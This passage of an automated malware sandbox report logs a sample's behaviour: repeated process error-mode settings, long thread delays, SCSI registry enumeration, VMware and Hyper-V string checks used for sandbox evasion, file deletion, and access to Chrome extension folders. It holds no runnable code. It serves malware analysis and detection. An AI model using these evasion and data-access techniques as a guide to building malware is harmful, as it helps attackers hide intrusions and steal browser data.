                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\djvbaaeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,20_2_03043862
                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_22-856
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                Source: aspnet_compiler.exe, 0000000D.00000002.2183507710.000000000109B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\AppData\Roaming\djvbaaeMemory allocated: AE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\djvbaaeMemory allocated: 2500000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\djvbaaeMemory allocated: 4500000 memory reserve | memory write watch
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030416C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,20_2_030416C7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\djvbaaeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4088Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5624Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7080Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2633Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1593Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 883Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4763Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4945Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 378
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1467
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 709
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5467
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 822
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 824
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 916Thread sleep count: 7080 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1928Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep count: 2633 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep count: 4763 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5576Thread sleep count: 4945 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6036Thread sleep count: 378 > 30
                Source: C:\Windows\explorer.exe TID: 3796Thread sleep count: 1467 > 30
                Source: C:\Windows\explorer.exe TID: 3796Thread sleep time: -146700s >= -30000s
                Source: C:\Windows\explorer.exe TID: 3396Thread sleep count: 709 > 30
                Source: C:\Windows\explorer.exe TID: 3396Thread sleep time: -70900s >= -30000s
                Source: C:\Windows\explorer.exe TID: 3796Thread sleep count: 5467 > 30
                Source: C:\Windows\explorer.exe TID: 3796Thread sleep time: -546700s >= -30000s
                Source: C:\Users\user\AppData\Roaming\djvbaae TID: 3228Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2312Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1700Thread sleep count: 58 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 1700Thread sleep time: -58000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 412Thread sleep count: 62 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 412Thread sleep time: -62000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 5560Thread sleep count: 56 > 30
                Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -56000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exe TID: 5292Thread sleep count: 44 > 30
                Source: C:\Windows\SysWOW64\explorer.exe TID: 5292Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\explorer.exe TID: 5168Thread sleep count: 54 > 30
                Source: C:\Windows\explorer.exe TID: 5168Thread sleep time: -54000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D62B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,17_2_02D62B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D63ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,17_2_02D63ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D61D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,17_2_02D61D4A
                Source: C:\Windows\explorer.exeCode function: 18_2_001E30A8 FindFirstFileW,FindNextFileW,FindClose,18_2_001E30A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0066255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,19_2_0066255C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030415BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,20_2_030415BE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030414D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,20_2_030414D8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030413FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,20_2_030413FE
                Source: C:\Windows\explorer.exeCode function: 21_2_00711DB0 FindFirstFileW,FindNextFileW,FindClose,21_2_00711DB0
                Source: C:\Windows\explorer.exeCode function: 21_2_00711EB4 FindFirstFileW,FindNextFileW,FindClose,21_2_00711EB4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D66512 GetSystemInfo,17_2_02D66512
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\djvbaaeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: explorer.exe, 0000000E.00000002.3020456325.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: powershell.exe, 00000001.00000002.1954134272.0000000007319000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1954134272.0000000007341000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000009.00000002.2244287376.000000000A101000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                Source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FsulatedPMSFT_NetEventVmNetworkAdatper.cdxml
                Source: explorer.exe, 0000000E.00000000.2152059428.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000011.00000002.2435370827.0000000003200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHc$
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: wscript.exe, 00000006.00000003.1891152717.00000000056E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\kOe
                Source: powershell.exe, 00000009.00000002.2161675097.0000000006F5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOt
                Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 0000000E.00000002.3020456325.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: wscript.exe, 00000006.00000003.1891152717.00000000056E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000E.00000000.2152059428.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VallSecurMSFTMSFT_NetEventVmNetworkAdatper.format.ps1xml
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 0000000E.00000000.2150818105.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: explorer.exe, 00000011.00000002.2435370827.0000000003246000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                Source: explorer.exe, 0000000E.00000000.2147790112.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 0000000E.00000000.2150818105.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: ModuleInformation
